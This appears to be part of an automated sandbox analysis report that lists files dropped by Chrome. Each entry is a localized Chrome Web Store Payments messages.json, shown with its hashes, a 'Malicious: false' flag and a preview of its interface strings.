C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\fi\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	647
Entropy (8bit):	4.595421267152647
Encrypted:	false
SSDEEP:	12:1HEJRuzGGRuz+WYpU34ujSBu+dgYO8ZpU34J+Bu03OyZnLAOfTY5HN:1HEFcWYpPNa8ZpD+FOGAOfEHN
MD5:	3A01FEE829445C482D1721FF63153D16
SHA1:	F3EAAADDC03F943FC88B30B67F534AA13E3336DD
SHA-256:	0BDE54B20845124113383B6EB81E43A0F05E4EB0C44BEE3C1DFAC4CC5FEC2836
SHA-512:	3B92B6C86D30FD36AA3CEFF8773BA60C3FC5CC19C693540137044C5838A5503895C770C0336A4D0A3DB5E42F3FB36274D8D3F85B9DCA2F3EC0E974FDDB0BEAD8
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome Web Storen maksut".. },.. "app_name": {.. "message": "Chrome Web Storen maksut".. },.. "craw_app_unavailable": {.. "message": "Sovellus ei ole t.ll. hetkell. k.ytett.viss..".. },.. "craw_connect_to_network": {.. "message": "Muodosta verkkoyhteys.".. },.. "iap_unavailable": {.. "message": "Sovelluksen sis.iset maksut eiv.t ole t.ll. hetkell. k.ytett.viss..".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Kirjaudu sis..n Chromeen.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\fil\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	658
Entropy (8bit):	4.5231229502550745
Encrypted:	false
SSDEEP:	12:1HEJADlbGGADlb+WYpU34hTUT+dgHfZAFFZO8ZpU34hTjzeT03OyZnLAOfTYHfvF:1HEYah6WYp7TUSoxOS8Zp7TOsOGAOfqV
MD5:	57AF5B654270A945BDA8053A83353A06
SHA1:	EEEF7A4F869F97CF471A05D345E74F982D15E167
SHA-256:	EC002ED92359F67818B49455DFC579E140368E6A004080AF022FD4F57F6B03F2
SHA-512:	5F0AE839FCF3F4EA48FF41A76655AE0F3821564AFD5D42FBB9FBB9A38E8D8F7BB5E9B6F71064588CD441261F644095A44A755C134CE546D506D9A21E488BAF52
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Mga Pagbabayad sa Chrome Web Store".. },.. "app_name": {.. "message": "Mga Pagbabayad sa Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Kasalukuyang hindi available ang app.".. },.. "craw_connect_to_network": {.. "message": "Mangyaring kumonekta sa isang network.".. },.. "iap_unavailable": {.. "message": "Kasalukuyang hindi available ang Mga Pagbabayad na In-App.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Mangyaring mag-sign in sa Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\fr\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	677
Entropy (8bit):	4.552569602149629
Encrypted:	false
SSDEEP:	12:1HEJALf/nbGGALf/nb+WYpU34Owdgbyb+dgdQjO8ZpU34ITQpGnbyb03OyZnLAO8:1HE4Hna1Hn6WYpNdgpY8ZpSTQwnBOGAh
MD5:	8D11C90F44A6585B57B933AB38D1FFF8
SHA1:	3F9D44EA8807069A32AACA2AAAD02FD892E6CC90
SHA-256:	599491F8C52B945C16C441ADF45BFD45AFAE046DA07757D97C56AF4DE75ED3B5
SHA-512:	D7EF7F5AD7EF1A1595825D79B69E2B1E988AD3CF1F3881496FCCD30F241E4E9C6E457F9F5D0F855DE3536DB7A40C3E1C55946B50D3F556F4A35285066A0CD6F7
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Paiements via le Chrome.Web.Store".. },.. "app_name": {.. "message": "Paiements via le Chrome.Web.Store".. },.. "craw_app_unavailable": {.. "message": "Application indisponible pour le moment.".. },.. "craw_connect_to_network": {.. "message": "Veuillez vous connecter . un r.seau.".. },.. "iap_unavailable": {.. "message": "Les paiements via l'application ne sont pas disponibles pour le moment.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Veuillez vous connecter . Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\hi\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	835
Entropy (8bit):	4.791154467711985
Encrypted:	false
SSDEEP:	24:1HEs07J0JWYp9vnCSVLP8Zp6CsOGAOf8SLm:Wh7qgYp1CMLUph1GiSLm
MD5:	E376D757C8FD66AC70A7D2D49760B94E
SHA1:	1525C5B1312D409604F097768503298EC440CC4D
SHA-256:	8106D98C4F8DA16DB698444409558E29CC96735E188BFA303C333A5D99231C1D
SHA-512:	673F3F259AF2946E4F49BBED14A2A70D44BF9FDA9D7A71DC9172BA9B7B3C7F7062B16D29682B638D485B0520ED6F99E7A735F28C7C719B539559005B69FA7555
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome ... ..... ......".. },.. "app_name": {.. "message": "Chrome ... ..... ......".. },.. "craw_app_unavailable": {.. "message": "......... .. ... ...... .... ...".. },.. "craw_connect_to_network": {.. "message": "..... ....... .. ...... .....".. },.. "iap_unavailable": {.. "message": "..-.. ...... ... ...... .... ...".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "..... Chrome ... .... .. .....".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\hr\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	618
Entropy (8bit):	4.56999230891419
Encrypted:	false
SSDEEP:	12:1HEJGiimxmbZGGGiimxmbZ+WYpU34OBOEuhopIO+dgcapZO8ZpU34GiiZrMrQphK:1HE4H4TH8WYpNjTta28ZpQVLP0SOGAOK
MD5:	8185D0490C86363602A137F9A261CC50
SHA1:	5BD933B874441CEACB9201CCC941FF67BAED6DC0
SHA-256:	A2B2EC359A9DD9DCCCE02859CE1E738BD30FAA4A05F1DC522893FFDF722BBC15
SHA-512:	D7629978FC031EA5F716F9C1065FB2FEAB48C15F10CD68830DC966FA1002C03DDC7ACDE314C7D075F9F3A0A68552A6ACBCCDEE24CF20B6C3DD1BCE6562D0396E
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Pla.anja u web-trgovini Chrome".. },.. "app_name": {.. "message": "Pla.anja u web-trgovini Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikacija trenuta.no nije dostupna.".. },.. "craw_connect_to_network": {.. "message": "Pove.ite se s mre.om.".. },.. "iap_unavailable": {.. "message": "Pla.anje u aplikaciji trenuta.no nije dostupno.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prijavite se na Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\hu\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	683
Entropy (8bit):	4.675370843321512
Encrypted:	false
SSDEEP:	12:1HEJVJiGGVJi+WYpU34Hpo9O+dgMmfgijO8ZpU34Huo9O03OyZnLAOfTYBIAYm:1HEVrk5WYpQzTUg/8ZpwoXOGAOfYIAd
MD5:	85609CF8623582A8376C206556ED2131
SHA1:	1E16EB70DB5E59BB684866FF3E3925C2DEF25A12
SHA-256:	32A249749F12ADB6A220BF9ADC272C7E5D9AD5497A38B0086D961E3ABA17FBC6
SHA-512:	27883430865D3CFA6EDFE8C6CE1442BD96150B5CE520CCF7D556A330CAA6392C712B47BD86F7350E174876BC681F6DEC94D1312402655B0AF90883A2899EC78B
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome Internetes .ruh.z Fizet.si rendszere".. },.. "app_name": {.. "message": "Chrome Internetes .ruh.z Fizet.si rendszere".. },.. "craw_app_unavailable": {.. "message": "Az alkalmaz.s jelenleg nem .rhet. el.".. },.. "craw_connect_to_network": {.. "message": "K.rj.k, csatlakozzon egy h.l.zathoz.".. },.. "iap_unavailable": {.. "message": "Az alkalmaz.son bel.li fizet.s jelenleg nem .rhet. el.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Jelentkezzen be a Chrome-ba.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\id\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	604
Entropy (8bit):	4.465685261172395
Encrypted:	false
SSDEEP:	12:1HEJs25bGGs25b+WYpU34ORBHAeSJ+dgkmO8ZpU34s22C/SzFAs03OyZnLAOfTYR:1HEBaA6WYpaHFH8ZptOYOGAOf2D
MD5:	EAB2B946D1232AB98137E760954003AA
SHA1:	60BDC2937905B311D2C9844DF2D639D7AC9F7F67
SHA-256:	C6E8800450602DE0F39FE9F6854472383813FB454B08ABAE7E25A9167CE004C3
SHA-512:	970FEC9A9EF0BAF7F693C4C5977F3B47914579C5B5414FCE9DBB5E4574659A5BB9AD2DE0CC886B368F49C019785AF7D2D7FE82F71341F039EADC399ED776CA12
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Pembayaran Chrome Webstore".. },.. "app_name": {.. "message": "Pembayaran Chrome Webstore".. },.. "craw_app_unavailable": {.. "message": "Aplikasi tidak tersedia saat ini.".. },.. "craw_connect_to_network": {.. "message": "Sambungkan ke jaringan.".. },.. "iap_unavailable": {.. "message": "Pembayaran Dalam Aplikasi saat ini tidak tersedia.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Harap masuk ke Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\it\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	603
Entropy (8bit):	4.479418964635223
Encrypted:	false
SSDEEP:	12:1HEJsqd/bGGsqd/b+WYpU34OcX4+dgUvIO8ZpU34vq703OyZnLAOfTYsD:1HEXd/aKd/6WYpZrv58ZpskOGAOfzD
MD5:	A328EEF5E841E0C72D3CD7366899C5C8
SHA1:	2851ED658385804E87911643F5A4200B1FB26E13
SHA-256:	CD891C45F7586FB4A2514205A11F260E4A6D4482FA03D901909DD9F57BE0536D
SHA-512:	E47297896E981774EC3B59D41B89D6BA9333F6B4435EB9727D8645A46B10C7D408ADE06844871FA757382FBE7E645276449DB7B1B23BC59C9A71A5CB5A5ECC57
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Pagamenti Chrome Web Store".. },.. "app_name": {.. "message": "Pagamenti Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "App al momento non disponibile.".. },.. "craw_connect_to_network": {.. "message": "Collegati a una rete.".. },.. "iap_unavailable": {.. "message": "La funzione Pagamenti In-App non . al momento disponibile.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Accedi a Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\ja\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	697
Entropy (8bit):	5.20469020877498
Encrypted:	false
SSDEEP:	12:1HEJ07uGG07u+WYpU34DB+dgnsVztO8ZpU34MwiB03OyZnLAOfTYmSH:1HEcnDNWYp1kxU8Zp2wiqOGAOfpSH
MD5:	9B3A5D473C3F2BBFAEECE94A07A940B8
SHA1:	61BACA342CF766BBA15C7B4D892A0E7DAC9405AA
SHA-256:	706312A4A2AEF3317223F141EB2B82685345B7EED444F16BB4DF3A272716DA1F
SHA-512:	94F6FEE9A11BD890AB8211C98D1CC142348961EBCF756F66477A3E3A76519804B70BE0AE4E551739F8AFE32D7ADE6EDE04EF6B9B9EED03E3A857E6058EEDD4C6
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome ........".. },.. "app_name": {.. "message": "Chrome ........".. },.. "craw_app_unavailable": {.. "message": ".................".. },.. "craw_connect_to_network": {.. "message": "................".. },.. "iap_unavailable": {.. "message": ".......................".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Chrome ............".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\ko\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	631
Entropy (8bit):	5.160315577642469
Encrypted:	false
SSDEEP:	12:1HEJ1GG1+WYpU34K3aT+dgh8d0HTO8ZpU34KaNkaT03OyZnLAOfTY/YeHx:1HEajWYpc3aSl0Hq8Zpc6kasOGAOfyYA
MD5:	9F6B4D82A70C74CA751E2EAE70FAB5CF
SHA1:	0534F125FFCE8222277CF2BE3401C59DAF9217F8
SHA-256:	D1467B8D037114403E8F4EFC52E88C4A7FEB96126BE4CFF883FEFF1084EF7E68
SHA-512:	ED9319830314385D09C06F62EE34186E8CA576C857981205E4468A28B3ACD2AB03384E77B866032C324ABDD97A56EFD08E2D6E0C79D563578B3EC52517819BD8
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome . ... ..".. },.. "app_name": {.. "message": "Chrome . ... ..".. },.. "craw_app_unavailable": {.. "message": ".. .. ... . .....".. },.. "craw_connect_to_network": {.. "message": "..... ......".. },.. "iap_unavailable": {.. "message": ".. .. ... ... . .....".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Chrome. .......".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\lt\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	665
Entropy (8bit):	4.66839186029557
Encrypted:	false
SSDEEP:	12:1HEJpqHnkGGpqHnk+WYpU346M+dgV6O8ZpU34WzSWz03OyZnLAOfTYx:1HELqHtKqHPWYpM3A8ZpwGzOGAOfg
MD5:	4CA644F875606986A9898D04BDAE3EA5
SHA1:	722A10569E93975129D67FBDB75B537D9D622AD1
SHA-256:	7C311AB751D840D750C11553C083785813E079C1D464FE568A98C9E3EF3DB96C
SHA-512:	E575E3D0622F5BD4B6C0EE79128A1B1F1882195670139D1983F4377D847141B8FB8EBB8BCED82AF3A220ED07D3577AFBE085BADC0E9C7678292B80E3EC5D3444
Malicious:	false
Preview:	{.. "app_description": {.. "message": ".Chrome. internetin.s parduotuv.s mok.jimo sistema".. },.. "app_name": {.. "message": ".Chrome. internetin.s parduotuv.s mok.jimo sistema".. },.. "craw_app_unavailable": {.. "message": "Programa .iuo metu negalima.".. },.. "craw_connect_to_network": {.. "message": "Prisijunkite prie tinklo.".. },.. "iap_unavailable": {.. "message": "Mok.jimai programoje .iuo metu negalimi.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prisijunkite prie .Chrome..".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\lv\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	671
Entropy (8bit):	4.631774066483956
Encrypted:	false
SSDEEP:	12:1HEJFhVbGGFhVb+WYpU34wDoz+dgGedBO8ZpU34wF03OyZnLAOfTYGYID:1HENQKkWYp2Doy/em8Zp2WOGAOfRYID
MD5:	C5CE2C51391EAFD3DA9E4C71549A3C28
SHA1:	1F67FF6EF6E90C0CE3AAF56ED543A3EFD381574D
SHA-256:	1FA1DF2CA8516DEF490FB8484E9AA498ACFF80EEF5C9258FFE42D3678E6C7DED
SHA-512:	C85F6281E682F52BC2147DEA7E2F3BB4DC48D98BADA8687B05C6C7271C78EA7F5431CD51671A4184C9AE004FC53C016E3C594697F483195CCBA08A93821EEF70
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome interneta veikala maks.jumu sist.ma".. },.. "app_name": {.. "message": "Chrome interneta veikala maks.jumu sist.ma".. },.. "craw_app_unavailable": {.. "message": "Lietotne pagaid.m nav pieejama.".. },.. "craw_connect_to_network": {.. "message": "L.dzu, izveidojiet savienojumu ar t.klu.".. },.. "iap_unavailable": {.. "message": "Maks.jumi lietotn.s pa.laik nav pieejami.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "L.dzu, pierakstieties p.rl.k. Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\nb\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	624
Entropy (8bit):	4.555032032637389
Encrypted:	false
SSDEEP:	12:1HEJhiOGGhiO+WYpU34OHSN+dgFjdGFZO8ZpU34JgdN03OyZnLAOfTYiD:1HEDiHIitWYpCYJ8ZpD1OGAOfRD
MD5:	93C459A23BC6953FF744C35920CD2AF9
SHA1:	162F884972103A08ADB616A7EB3598431A2924C5
SHA-256:	2CD700AEB57D89C2E73333D0702556EE3FF3863516170F85669BC680FCBDC4E0
SHA-512:	F76E6E8D8499306883C3EC1E774F7E8BB6B601096DA5A14D17D3E7D5732829542041E42B7350466589291ADCC83FB065FD591B4E20CFCF8EDC586E128ECBFCB5
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome Nettmarked-betalinger".. },.. "app_name": {.. "message": "Chrome Nettmarked-betalinger".. },.. "craw_app_unavailable": {.. "message": "Appen er utilgjengelig for .yeblikket.".. },.. "craw_connect_to_network": {.. "message": "Du m. koble til et nettverk.".. },.. "iap_unavailable": {.. "message": "Betaling i app er ikke tilgjengelig for .yeblikket.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Du m. logge p. Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\nl\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	615
Entropy (8bit):	4.4715318546237315
Encrypted:	false
SSDEEP:	12:1HEJJQGkbGGJQGkb+WYpU34OQKJT+dgiXUmvFZO8ZpU34g7JT03OyZnLAOfTYMD:1HErxkaqxk6WYptndXI8ZpTOGAOfbD
MD5:	7A8F9D0249C680F64DEC7650A432BD57
SHA1:	53477198AEE389F6580921B4876719B400A23CA1
SHA-256:	92BE7C2DC9CFBE5A65E9CE6488D364C8D7EC19E7B67A31E4D43C1CB2B169671C
SHA-512:	969AB979546A741C0F3EDBEEB21BABA375FA8870D4FB9248CDD4C305736E332E10CAB7B64C5C078E60EC0CD73848101B390BE8F44B89C310058AF4C1CA3C8AA7
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Betalingen via Chrome Web Store".. },.. "app_name": {.. "message": "Betalingen via Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "App momenteel niet beschikbaar.".. },.. "craw_connect_to_network": {.. "message": "Maak verbinding met een netwerk.".. },.. "iap_unavailable": {.. "message": "In-app-betalingen is momenteel niet beschikbaar.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Log in bij Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\pl\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	636
Entropy (8bit):	4.646901997539488
Encrypted:	false
SSDEEP:	12:1HEJbiVbGGbiVb+WYpU34OBHlBi9+dgQUg6O8ZpU34bdbfiIu03OyZnLAOfTYR5k:1HE5iVauiV6WYpIAYr8ZpxFiaOGAOfIC
MD5:	0E6194126AFCCD1E3098D276A7400175
SHA1:	E8127B905A640B1C46362FA6E1127BE172F4A40F
SHA-256:	E2699F98C511B18A2AFB82EAE9A4804B646C4FF1077D80E77C17A3943A6373C2
SHA-512:	A71F7C7BFBBF1E37E699601AF2E095C56CBA91F90CB7556477DF31D01B83ADFB1271E1775C9BA299FF6875BBFC2B6AB47488CC88E33DEF2F6F2E0E5AC687B777
Malicious:	false
Preview:	{.. "app_description": {.. "message": "P.atno.ci w sklepie Chrome Web Store".. },.. "app_name": {.. "message": "P.atno.ci w sklepie Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplikacja jest obecnie niedost.pna.".. },.. "craw_connect_to_network": {.. "message": "Po..cz si. z sieci..".. },.. "iap_unavailable": {.. "message": "P.atno.ci w ramach aplikacji s. teraz niedost.pne.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Zaloguj si. w Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\pt_BR\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	636
Entropy (8bit):	4.515158874306633
Encrypted:	false
SSDEEP:	12:1HEJsc/bGGsc/b+WYpU34OLw+dgn/KzO8ZpU34FjIBMwGRO03OyZnLAOfTYN+KcY:1HEb/a8/6WYp4mZ8Zp7cKlOGAOf2tD
MD5:	86A2B91FA18B867209024C522ED665D5
SHA1:	63DEC245637818C76655E01FCB6D59784BC7184E
SHA-256:	6374880FDD1F8AF1EE8AEA6A06B73BE0AB265AFCEB4FE6F08BDE3B3989264B21
SHA-512:	DA6DBDE5028756421C2904F605632EE98831A25A1247E6238A931629B94CE8A00FD76F4235F118D2167304BD60F2C06B2AD78E54FF6CE53F8C38DF8C7B5AFCE4
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Pagamentos da Chrome Web Store".. },.. "app_name": {.. "message": "Pagamentos da Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplicativo indispon.vel no momento.".. },.. "craw_connect_to_network": {.. "message": "Conecte-se a uma rede.".. },.. "iap_unavailable": {.. "message": "No momento, os Pagamentos no aplicativo n.o est.o dispon.veis.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Fa.a login no Google Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\pt_PT\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	622
Entropy (8bit):	4.526171498622949
Encrypted:	false
SSDEEP:	12:1HEJsZUkbGGsZUkb+WYpU34OAE+dgqxKzO8ZpU34rEpBfvPO03OyZnLAOfTYLD:1HEmUka5Uk6WYpFvdxZ8ZpSTnPlOGAOS
MD5:	750A4800EDB93FBE56495963F9FB3B94
SHA1:	8BFB915488A4EB3CB33D68E2E59F1F8447DB7D61
SHA-256:	C1C94F65FABAF17DEF98A8587711A56D61B1E5607500E9B01F2824DB109F9E83
SHA-512:	2AEDEF5793406221BE76AF22031CE8C30AB5FAEAED09BB394C153E2EBE990C89C1A2A73B40D8A92842641AFCA8C77FFD808A2058602D3646FD8DAE2844406F24
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Pagamentos via Chrome Web Store".. },.. "app_name": {.. "message": "Pagamentos via Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplica..o atualmente indispon.vel.".. },.. "craw_connect_to_network": {.. "message": "Ligue-se a uma rede.".. },.. "iap_unavailable": {.. "message": "Os Pagamentos na app est.o atualmente indispon.veis.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicie sess.o no Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\ro\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	641
Entropy (8bit):	4.61125938671415
Encrypted:	false
SSDEEP:	12:1HEJqJrJZGGqJrJZ+WYpU344HIx2Z+dgrVPlZO8ZpU34qT7hI3O03OyZnLAOfTYU:1HEC4D8WYpKow8WV68ZpKhoOGAOfoVGD
MD5:	98D43E4B1054A65DF3FA3CC40AB6FB6D
SHA1:	46E0A21C4DA2BB5D4D8F837AE211C1B6FA26E7E2
SHA-256:	113A13900CBA62FE8AED06751971C23A80A99B47F9BE219CF884D57DB19611D9
SHA-512:	A76DC53912A4F46714926B9EA2B22E909540E447F61F6DD72607AB7B3BB5D4A9B39E525B04C33AEC53BA813D14AC1FB5827275B2524E52B693E83171E1CD1466
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Pl..i prin Magazinul web Chrome".. },.. "app_name": {.. "message": "Pl..i prin Magazinul web Chrome".. },.. "craw_app_unavailable": {.. "message": ".n prezent, aplica.ia nu este disponibil..".. },.. "craw_connect_to_network": {.. "message": "Conecteaz.-te la o re.ea.".. },.. "iap_unavailable": {.. "message": "Pl..ile .n aplica.ie nu sunt disponibile momentan.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Conecteaz.-te la Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\ru\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	744
Entropy (8bit):	4.918620852166656
Encrypted:	false
SSDEEP:	12:1HEJ7OJHZMSl3ZGG7OJHZMSl3Z+WYpU34zWJ2F+dgVtLSv/TO8ZpU347NWjT03On:1HElOJHZMq4uOJHZMq8WYpdWJ/YGHq8m
MD5:	DB2EDF1465946C06BD95C71A1E13AE64
SHA1:	FB4F3ECE9ECECEBBC6CA2A592A15FB9C1FDFB811
SHA-256:	FBAF22CE6E16DE174CED8CB5EA3098CCA1C3426A2111FF33BD3E64DA64ED67AB
SHA-512:	4E0CF00BAEF1757548DEB17BBE1AF55770A0A0F7351779EF55C7DEFA6D112D0227B8865C2C22E0EC62E6E2F1C8E1632A2D0CE6828D25C5ABBF143C990116F632
Malicious:	false
Preview:	{.. "app_description": {.. "message": "......... ....... ........-........ Chrome".. },.. "app_name": {.. "message": "......... ....... ........-........ Chrome".. },.. "craw_app_unavailable": {.. "message": ".......... ...........".. },.. "craw_connect_to_network": {.. "message": "............ . .....".. },.. "iap_unavailable": {.. "message": "....... ..... .......... ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "....... . Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\sk\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	647
Entropy (8bit):	4.640777810668463
Encrypted:	false
SSDEEP:	12:1HEJfZGGfZ+WYpU34ORO+dgmmCO8ZpU34yH7u2Z03OyZnLAOfTYCUAi0D:1HEl4G8WYpetPmD8ZpcH7aOGAOfzUeD
MD5:	8DF215D1EFBDABB175CCDD68ED8DCB0A
SHA1:	2B374462137A38589A73FDD00A84CBDC7E50F9F4
SHA-256:	7FA16AF97E6CFC52EC6008EB679D3F30E7E0C24F9EF2D18A9228EAF4DED9D63B
SHA-512:	C0E623343BDAEB4731800D183B59F2FCFE285F0C7153EC99641FD84F2F2DCFE47D21E73F3D28B1240340453C5668EB0AFFBE087AAB62F1C88CD2A40CC44E599D
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "app_name": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplik.cia moment.lne nie je dostupn..".. },.. "craw_connect_to_network": {.. "message": "Pripojte sa k sieti.".. },.. "iap_unavailable": {.. "message": "Platby v aplik.cii moment.lne nie s. k dispoz.cii.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prihl.ste sa do prehliada.a Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\sl\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	617
Entropy (8bit):	4.5101656584816885
Encrypted:	false
